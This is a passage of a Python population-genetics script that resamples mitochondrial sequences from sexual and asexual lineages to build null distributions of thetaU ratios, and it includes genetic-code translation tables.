">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,4494)}
thetaUR7Dict = {">$Heron2":(0,4745.33333333), ">$clone_1":(0,4744.33333333), ">$Rotoiti_1_4n":(0,4786.70833328), ">$AC51":(1,4745), ">$Heron_mitochondrion":(0,4744.66666667), ">$Grasmere_6_3n":(1,4753.91666665), ">$Poerua_triploid":(0,4744.33333333), ">$Brunner_6_3n":(3,4795.24999994), ">$McGregor":(0,4745), ">$Poerua_72_4n":(0,4806.62499992), ">$Gunn":(4,4744), ">$Grasmere_1_4n":(1,4949.99999963), ">$clone_7":(0,4749.04166667), ">$DenmarkA":(0,4749.25), ">$Duluth":(1,4748.70833333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,4749.91666667), ">$Waik37":(1,4753.16666667), ">$Waik372":(3,4748.83333333), ">$Tarawera":(0,4752.83333333), ">$Kaniere_triploid":(0,4751.5), ">$Waik36":(3,4747.16666667), ">$WalesC":(2,4748.5), ">$Brunner_2_4n":(3,4787.54166659), ">$Lady":(2,4746.33333333), ">$Kaniere_1_2n":(2,4744), ">$Rotoroa_1_2n":(1,4782.83333329), ">$AlexMap":(0,4744.66666667), ">$Alexsex":(0,4744.66666667), ">$Yellow_Contig_56":(0,4744.66666667), ">$Ianthe":(0,4744.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,4745.33333333)}
D1 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#thetaU-C/thetaU-S
D2 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#thetaU-R/thetaU-S
logfile = open('mt_nullDistribution_thetaU.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
else:
outList.append(seq)
seqNums = range(len(popList))
currPCT = 0
sexN = 8
asexN = 23
sexAn = aN(sexN)
asexAn = aN(asexN)
logfile.write('Calculating population genetic parameters:\n')
logfile.close()
while len(D1['mean']) < 10000:
newPCT = int(round(100*len(D1['mean'])/10000.0))
if newPCT > currPCT:
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(newPCT) + '% complete\n')
logfile.close()
currPCT = newPCT
sexList = []
asexList = []
while len(sexList) < sexN:
currNum = random.choice(seqNums)
if popList[currNum] not in sexList:
sexList.append(popList[currNum])
while len(asexList) < asexN:
currNum = random.choice(seqNums)
if popList[currNum] not in asexList and popList[currNum] not in sexList:
asexList.append(popList[currNum])
asexSS = 0
asexMeanCS = 0
asexMeanRS = 0
asexC1S = 0
asexC2S = 0
asexC3S = 0
asexC4S = 0
asexC5S = 0
asexC6S = 0
asexC7S = 0
asexR1S = 0
asexR2S = 0
asexR3S = 0
asexR4S = 0
asexR5S = 0
asexR6S = 0
asexR7S = 0
sexSS = 0
sexMeanCS = 0
sexMeanRS = 0
sexC1S = 0
sexC2S = 0
sexC3S = 0
sexC4S = 0
sexC5S = 0
sexC6S = 0
sexC7S = 0
sexR1S = 0
sexR2S = 0
sexR3S = 0
sexR4S = 0
sexR5S = 0
sexR6S = 0
sexR7S = 0
asexSynSites = 0
asexMeanCSites = 0
asexMeanRSites = 0
asexC1Sites = 0
asexC2Sites = 0
asexC3Sites = 0
asexC4Sites = 0
asexC5Sites = 0
asexC6Sites = 0
asexC7Sites = 0
asexR1Sites = 0
asexR2Sites = 0
asexR3Sites = 0
asexR4Sites = 0
asexR5Sites = 0
asexR6Sites = 0
asexR7Sites = 0
sexSynSites = 0
sexMeanCSites = 0
sexMeanRSites = 0
sexC1Sites = 0
sexC2Sites = 0
sexC3Sites = 0
sexC4Sites = 0
sexC5Sites = 0
sexC6Sites = 0
sexC7Sites = 0
sexR1Sites = 0
sexR2Sites = 0
sexR3Sites = 0
sexR4Sites = 0
sexR5Sites = 0
sexR6Sites = 0
sexR7Sites = 0
for asexual in asexList:
currSynValues = thetaUSDict[asexual]
asexSS += currSynValues[0]
asexSynSites += currSynValues[1]
currMeanCValues = thetaUmeanCDict[asexual]
asexMeanCS += currMeanCValues[0]
asexMeanCSites += currMeanCValues[1]
currMeanRValues = thetaUmeanRDict[asexual]
asexMeanRS += currMeanRValues[0]
asexMeanRSites += currMeanRValues[1]
currC1Values = thetaUC1Dict[asexual]
asexC1S += currC1Values[0]
asexC1Sites += currC1Values[1]
currC2Values = thetaUC2Dict[asexual]
asexC2S += currC2Values[0]
asexC2Sites += currC2Values[1]
currC3Values = thetaUC3Dict[asexual]
asexC3S += currC3Values[0]
asexC3Sites += currC3Values[1]
currC4Values = thetaUC4Dict[asexual]
asexC4S += currC4Values[0]
asexC4Sites += currC4Values[1]
currC5Values = thetaUC5Dict[asexual]
asexC5S += currC5Values[0]
asexC5Sites += currC5Values[1]
currC6Values = thetaUC6Dict[asexual]
asexC6S += currC6Values[0]
asexC6Sites += currC6Values[1]
currC7Values = thetaUC7Dict[asexual]
asexC7S += currC7Values[0]
asexC7Sites += currC7Values[1]
currR1Values = thetaUR1Dict[asexual]
asexR1S += currR1Values[0]
asexR1Sites += currR1Values[1]
currR2Values = thetaUR2Dict[asexual]
asexR2S += currR2Values[0]
asexR2Sites += currR2Values[1]
currR3Values = thetaUR3Dict[asexual]
asexR3S += currR3Values[0]
asexR3Sites += currR3Values[1]
currR4Values = thetaUR4Dict[asexual]
asexR4S += currR4Values[0]
asexR4Sites += currR4Values[1]
currR5Values = thetaUR5Dict[asexual]
asexR5S += currR5Values[0]
asexR5Sites += currR5Values[1]
currR6Values = thetaUR6Dict[asexual]
asexR6S += currR6Values[0]
asexR6Sites += currR6Values[1]
currR7Values = thetaUR7Dict[asexual]
asexR7S += currR7Values[0]
asexR7Sites += currR7Values[1]
for sexual in sexList:
currSynValues = thetaUSDict[sexual]
sexSS += currSynValues[0]
sexSynSites += currSynValues[1]
currMeanCValues = thetaUmeanCDict[sexual]
sexMeanCS += currMeanCValues[0]
sexMeanCSites += currMeanCValues[1]
currMeanRValues = thetaUmeanRDict[sexual]
sexMeanRS += currMeanRValues[0]
sexMeanRSites += currMeanRValues[1]
currC1Values = thetaUC1Dict[sexual]
sexC1S += currC1Values[0]
sexC1Sites += currC1Values[1]
currC2Values = thetaUC2Dict[sexual]
sexC2S += currC2Values[0]
sexC2Sites += currC2Values[1]
currC3Values = thetaUC3Dict[sexual]
sexC3S += currC3Values[0]
sexC3Sites += currC3Values[1]
currC4Values = thetaUC4Dict[sexual]
sexC4S += currC4Values[0]
sexC4Sites += currC4Values[1]
currC5Values = thetaUC5Dict[sexual]
sexC5S += currC5Values[0]
sexC5Sites += currC5Values[1]
currC6Values = thetaUC6Dict[sexual]
sexC6S += currC6Values[0]
sexC6Sites += currC6Values[1]
currC7Values = thetaUC7Dict[sexual]
sexC7S += currC7Values[0]
sexC7Sites += currC7Values[1]
currR1Values = thetaUR1Dict[sexual]
sexR1S += currR1Values[0]
sexR1Sites += currR1Values[1]
currR2Values = thetaUR2Dict[sexual]
sexR2S += currR2Values[0]
sexR2Sites += currR2Values[1]
currR3Values = thetaUR3Dict[sexual]
sexR3S += currR3Values[0]
sexR3Sites += currR3Values[1]
currR4Values = thetaUR4Dict[sexual]
sexR4S += currR4Values[0]
sexR4Sites += currR4Values[1]
currR5Values = thetaUR5Dict[sexual]
sexR5S += currR5Values[0]
sexR5Sites += currR5Values[1]
currR6Values = thetaUR6Dict[sexual]
sexR6S += currR6Values[0]
sexR6Sites += currR6Values[1]
currR7Values = thetaUR7Dict[sexual]
sexR7S += currR7Values[0]
sexR7Sites += currR7Values[1]
asexThetaUS = float(asexSS)/(asexAn*(float(asexSynSites)/len(asexList)))
asexThetaUMeanC = float(asexMeanCS)/(asexAn*(float(asexMeanCSites)/len(asexList)))
asexThetaUMeanR = float(asexMeanRS)/(asexAn*(float(asexMeanRSites)/len(asexList)))
asexThetaUC1 = float(asexC1S)/(asexAn*(float(asexC1Sites)/len(asexList)))
asexThetaUC2 = float(asexC2S)/(asexAn*(float(asexC2Sites)/len(asexList)))
asexThetaUC3 = float(asexC3S)/(asexAn*(float(asexC3Sites)/len(asexList)))
asexThetaUC4 = float(asexC4S)/(asexAn*(float(asexC4Sites)/len(asexList)))
asexThetaUC5 = float(asexC5S)/(asexAn*(float(asexC5Sites)/len(asexList)))
asexThetaUC6 = float(asexC6S)/(asexAn*(float(asexC6Sites)/len(asexList)))
asexThetaUC7 = float(asexC7S)/(asexAn*(float(asexC7Sites)/len(asexList)))
asexThetaUR1 = float(asexR1S)/(asexAn*(float(asexR1Sites)/len(asexList)))
asexThetaUR2 = float(asexR2S)/(asexAn*(float(asexR2Sites)/len(asexList)))
asexThetaUR3 = float(asexR3S)/(asexAn*(float(asexR3Sites)/len(asexList)))
asexThetaUR4 = float(asexR4S)/(asexAn*(float(asexR4Sites)/len(asexList)))
asexThetaUR5 = float(asexR5S)/(asexAn*(float(asexR5Sites)/len(asexList)))
asexThetaUR6 = float(asexR6S)/(asexAn*(float(asexR6Sites)/len(asexList)))
asexThetaUR7 = float(asexR7S)/(asexAn*(float(asexR7Sites)/len(asexList)))
sexThetaUS = float(sexSS)/(sexAn*(float(sexSynSites)/len(sexList)))
sexThetaUMeanC = float(sexMeanCS)/(sexAn*(float(sexMeanCSites)/len(sexList)))
sexThetaUMeanR = float(sexMeanRS)/(sexAn*(float(sexMeanRSites)/len(sexList)))
sexThetaUC1 = float(sexC1S)/(sexAn*(float(sexC1Sites)/len(sexList)))
sexThetaUC2 = float(sexC2S)/(sexAn*(float(sexC2Sites)/len(sexList)))
sexThetaUC3 = float(sexC3S)/(sexAn*(float(sexC3Sites)/len(sexList)))
sexThetaUC4 = float(sexC4S)/(sexAn*(float(sexC4Sites)/len(sexList)))
sexThetaUC5 = float(sexC5S)/(sexAn*(float(sexC5Sites)/len(sexList)))
sexThetaUC6 = float(sexC6S)/(sexAn*(float(sexC6Sites)/len(sexList)))
sexThetaUC7 = float(sexC7S)/(sexAn*(float(sexC7Sites)/len(sexList)))
sexThetaUR1 = float(sexR1S)/(sexAn*(float(sexR1Sites)/len(sexList)))
sexThetaUR2 = float(sexR2S)/(sexAn*(float(sexR2Sites)/len(sexList)))
sexThetaUR3 = float(sexR3S)/(sexAn*(float(sexR3Sites)/len(sexList)))
sexThetaUR4 = float(sexR4S)/(sexAn*(float(sexR4Sites)/len(sexList)))
sexThetaUR5 = float(sexR5S)/(sexAn*(float(sexR5Sites)/len(sexList)))
sexThetaUR6 = float(sexR6S)/(sexAn*(float(sexR6Sites)/len(sexList)))
sexThetaUR7 = float(sexR7S)/(sexAn*(float(sexR7Sites)/len(sexList)))
if asexThetaUS != 0 and sexThetaUS != 0:
asexThetaUMeanC_thetaUS = asexThetaUMeanC/asexThetaUS
asexThetaUMeanR_thetaUS = asexThetaUMeanR/asexThetaUS
asexThetaUC1_thetaUS = asexThetaUC1/asexThetaUS
asexThetaUC2_thetaUS = asexThetaUC2/asexThetaUS
asexThetaUC3_thetaUS = asexThetaUC3/asexThetaUS
asexThetaUC4_thetaUS = asexThetaUC4/asexThetaUS
asexThetaUC5_thetaUS = asexThetaUC5/asexThetaUS
asexThetaUC6_thetaUS = asexThetaUC6/asexThetaUS
asexThetaUC7_thetaUS = asexThetaUC7/asexThetaUS
asexThetaUR1_thetaUS = asexThetaUR1/asexThetaUS
asexThetaUR2_thetaUS = asexThetaUR2/asexThetaUS
asexThetaUR3_thetaUS = asexThetaUR3/asexThetaUS
asexThetaUR4_thetaUS = asexThetaUR4/asexThetaUS
asexThetaUR5_thetaUS = asexThetaUR5/asexThetaUS
asexThetaUR6_thetaUS = asexThetaUR6/asexThetaUS
asexThetaUR7_thetaUS = asexThetaUR7/asexThetaUS
sexThetaUMeanC_thetaUS = sexThetaUMeanC/sexThetaUS
sexThetaUMeanR_thetaUS = sexThetaUMeanR/sexThetaUS
sexThetaUC1_thetaUS = sexThetaUC1/sexThetaUS
sexThetaUC2_thetaUS = sexThetaUC2/sexThetaUS
sexThetaUC3_thetaUS = sexThetaUC3/sexThetaUS
sexThetaUC4_thetaUS = sexThetaUC4/sexThetaUS
sexThetaUC5_thetaUS = sexThetaUC5/sexThetaUS
sexThetaUC6_thetaUS = sexThetaUC6/sexThetaUS
sexThetaUC7_thetaUS = sexThetaUC7/sexThetaUS
sexThetaUR1_thetaUS = sexThetaUR1/sexThetaUS
sexThetaUR2_thetaUS = sexThetaUR2/sexThetaUS
sexThetaUR3_thetaUS = sexThetaUR3/sexThetaUS
sexThetaUR4_thetaUS = sexThetaUR4/sexThetaUS
sexThetaUR5_thetaUS = sexThetaUR5/sexThetaUS
sexThetaUR6_thetaUS = sexThetaUR6/sexThetaUS
sexThetaUR7_thetaUS = sexThetaUR7/sexThetaUS
D1_mean = asexThetaUMeanC_thetaUS - sexThetaUMeanC_thetaUS
D1_1 = asexThetaUC1_thetaUS - sexThetaUC1_thetaUS
D1_2 = asexThetaUC2_thetaUS - sexThetaUC2_thetaUS
D1_3 = asexThetaUC3_thetaUS - sexThetaUC3_thetaUS
D1_4 = asexThetaUC4_thetaUS - sexThetaUC4_thetaUS
D1_5 = asexThetaUC5_thetaUS - sexThetaUC5_thetaUS
D1_6 = asexThetaUC6_thetaUS - sexThetaUC6_thetaUS
D1_7 = asexThetaUC7_thetaUS - sexThetaUC7_thetaUS
D2_mean = asexThetaUMeanR_thetaUS - sexThetaUMeanR_thetaUS
D2_1 = asexThetaUR1_thetaUS - sexThetaUR1_thetaUS
D2_2 = asexThetaUR2_thetaUS - sexThetaUR2_thetaUS
D2_3 = asexThetaUR3_thetaUS - sexThetaUR3_thetaUS
D2_4 = asexThetaUR4_thetaUS - sexThetaUR4_thetaUS
D2_5 = asexThetaUR5_thetaUS - sexThetaUR5_thetaUS
D2_6 = asexThetaUR6_thetaUS - sexThetaUR6_thetaUS
D2_7 = asexThetaUR7_thetaUS - sexThetaUR7_thetaUS
currD1_Mean = D1['mean']
currD1_1 = D1[1]
currD1_2 = D1[2]
currD1_3 = D1[3]
currD1_4 = D1[4]
currD1_5 = D1[5]
currD1_6 = D1[6]
currD1_7 = D1[7]
currD2_Mean = D2['mean']
currD2_1 = D2[1]
currD2_2 = D2[2]
currD2_3 = D2[3]
currD2_4 = D2[4]
currD2_5 = D2[5]
currD2_6 = D2[6]
currD2_7 = D2[7]
currD1_Mean.append(D1_mean)
currD1_1.append(D1_1)
currD1_2.append(D1_2)
currD1_3.append(D1_3)
currD1_4.append(D1_4)
currD1_5.append(D1_5)
currD1_6.append(D1_6)
currD1_7.append(D1_7)
currD2_Mean.append(D2_mean)
currD2_1.append(D2_1)
currD2_2.append(D2_2)
currD2_3.append(D2_3)
currD2_4.append(D2_4)
currD2_5.append(D2_5)
currD2_6.append(D2_6)
currD2_7.append(D2_7)
D1['mean'] = currD1_Mean
D1[1] = currD1_1
D1[2] = currD1_2
D1[3] = currD1_3
D1[4] = currD1_4
D1[5] = currD1_5
D1[6] = currD1_6
D1[7] = currD1_7
D2['mean'] = currD2_Mean
D2[1] = currD2_1
D2[2] = currD2_2
D2[3] = currD2_3
D2[4] = currD2_4
D2[5] = currD2_5
D2[6] = currD2_6
D2[7] = currD2_7
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('Finished calculating population genetic parameters\nSorting Population Genetic Parameters\n')
logfile.close()
sortedD1_1 = sorted(D1[1])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(1.0/32))) + '% complete\n')
logfile.close()
sortedD1_2 = sorted(D1[2])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(2.0/32))) + '% complete\n')
logfile.close()
sortedD1_3 = sorted(D1[3])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(3.0/32))) + '% complete\n')
logfile.close()
sortedD1_4 = sorted(D1[4])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(4.0/32))) + '% complete\n')
logfile.close()
sortedD1_5 = sorted(D1[5])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(5.0/32))) + '% complete\n')
logfile.close()
sortedD1_6 = sorted(D1[6])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(6.0/32))) + '% complete\n')
logfile.close()
sortedD1_7 = sorted(D1[7])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(7.0/32))) + '% complete\n')
logfile.close()
sortedD1_Mean = sorted(D1['mean'])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(8.0/32))) + '% complete\n')
logfile.close()
sortedD2_1 = sorted(D2[1])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(9.0/32))) + '% complete\n')
logfile.close()
sortedD2_2 = sorted(D2[2])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(10.0/32))) + '% complete\n')
logfile.close()
sortedD2_3 = sorted(D2[3])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(11.0/32))) + '% complete\n')
logfile.close()
sortedD2_4 = sorted(D2[4])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(12.0/32))) + '% complete\n')
logfile.close()
sortedD2_5 = sorted(D2[5])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(13.0/32))) + '% complete\n')
logfile.close()
sortedD2_6 = sorted(D2[6])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(14.0/32))) + '% complete\n')
logfile.close()
sortedD2_7 = sorted(D2[7])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(15.0/32))) + '% complete\n')
logfile.close()
sortedD2_Mean = sorted(D2['mean'])
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(round(100*(16.0/32))) + '% complete\n')
logfile.close()
i = 0
sys.stdout.write('D1_mean\tD2_mean\tD1_1\tD1_2\tD1_3\tD1_4\tD1_5\tD1_6\tD1_7\tD2_1\tD2_2\tD2_3\tD2_4\tD2_5\tD2_6\tD2_7\n')
while i < 10000:
sys.stdout.write(str(sortedD1_Mean[i]) + '\t' + str(sortedD2_Mean[i]) + '\t' + str(sortedD1_1[i]) + '\t' + str(sortedD1_2[i]) + '\t' + str(sortedD1_3[i]) + '\t' + str(sortedD1_4[i]) + '\t' + str(sortedD1_5[i]) + '\t' + str(sortedD1_6[i]) + '\t' + str(sortedD1_7[i]) + '\t' + str(sortedD2_1[i]) + '\t' + str(sortedD2_2[i]) + '\t' + str(sortedD2_3[i]) + '\t' + str(sortedD2_4[i]) + '\t' + str(sortedD2_5[i]) + '\t' + str(sortedD2_6[i]) + '\t' + str(sortedD2_7[i]) + '\n')
i += 1
logfile.close()
def thetaUSyn(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 